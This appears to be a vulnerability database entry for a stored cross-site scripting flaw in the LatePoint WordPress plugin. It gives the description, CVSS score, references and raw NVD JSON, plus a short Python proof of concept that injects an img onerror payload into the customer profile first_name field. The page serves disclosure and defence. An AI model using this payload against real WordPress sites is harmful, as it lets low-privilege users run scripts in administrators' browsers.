CVE-2026-7457

Description

The LatePoint plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to and including 5.5.0. This is due to insufficient input sanitization on the customer cabinet profile update endpoint — where raw POST parameters (first_name, last_name, phone, notes) bypass sanitization because OsCustomerModel does not override params_to_sanitize(), causing set_data() to store unsanitized values verbatim in the database — combined with insufficient output escaping in generate_preview(), which injects those stored values into notification template HTML via str_replace() without any esc_html() call before echoing the result. This makes it possible for authenticated attackers with customer-level access or above to inject arbitrary web scripts into the admin notification preview panel that execute in an administrator's or agent's browser whenever a notification template referencing customer variables such as {{customer_full_name}}, {{customer_first_name}}, {{customer_last_name}}, {{customer_phone}}, or {{customer_notes}} is previewed.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress LatePoint 插件 <= 5.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target URL (replace with actual target) target_url = "https://example.com/wp-admin/admin-ajax.php" # Attacker session cookie (customer level) cookies = { "wordpress_logged_in_xxx": "attacker_session_cookie" } # Malicious payload to be injected in first_name payload = "<img src=x onerror=alert('XSS')>" # Vulnerable POST data to update customer profile # OsCustomerModel does not override params_to_sanitize() data = { "action": "latepoint_update_customer_profile", "first_name": payload, # Injected payload "last_name": "Test", "phone": "123456789", "email": "[email protected]" } # Send the request to store the XSS response = requests.post(target_url, data=data, cookies=cookies) if response.status_code == 200: print("[+] Payload stored successfully. Trigger by previewing notification template.") else: print("[-] Failed to inject payload.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7457
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7457
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7457/
[4] VulDB https://vuldb.com/cve/CVE-2026-7457
[5] https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/controllers/customer_cabinet_controller.php#L318
[6] https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/helpers/replacer_helper.php#L276
[7] https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/misc/process_action.php#L606
[8] https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/controllers/customer_cabinet_controller.php#L318
[9] https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/replacer_helper.php#L276
[10] https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/misc/process_action.php#L606
[11] https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/controllers/customer_cabinet_controller.php#L318
[12] https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/replacer_helper.php#L276
[13] https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/misc/process_action.php#L606
[14] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3522933%40latepoint%2Ftrunk&old=3516282%40latepoint%2Ftrunk&sfp_email=&sfph_mail=

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7457", "sourceIdentifier": "[email protected]", "published": "2026-05-06T08:16:04.360", "lastModified": "2026-05-06T13:06:42.220", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LatePoint plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to and including 5.5.0. This is due to insufficient input sanitization on the customer cabinet profile update endpoint — where raw POST parameters (first_name, last_name, phone, notes) bypass sanitization because OsCustomerModel does not override params_to_sanitize(), causing set_data() to store unsanitized values verbatim in the database — combined with insufficient output escaping in generate_preview(), which injects those stored values into notification template HTML via str_replace() without any esc_html() call before echoing the result. This makes it possible for authenticated attackers with customer-level access or above to inject arbitrary web scripts into the admin notification preview panel that execute in an administrator's or agent's browser whenever a notification template referencing customer variables such as {{customer_full_name}}, {{customer_first_name}}, {{customer_last_name}}, {{customer_phone}}, or {{customer_notes}} is previewed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/controllers/customer_cabinet_controller.php#L318", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/helpers/replacer_helper.php#L276", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/misc/process_action.php#L606", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/controllers/customer_cabinet_controller.php#L318", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/replacer_helper.php#L276", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/misc/process_action.php#L606", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/controllers/customer_cabinet_controller.php#L318", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/replacer_helper.php#L276", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/misc/process_action.php#L606", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3522933%40latepoint%2Ftrunk&old=3516282%40latepoint%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/628b3f53-decd-47ac-a2d1-339ade1e6944?source=cve", "source": "[email protected]"}]}}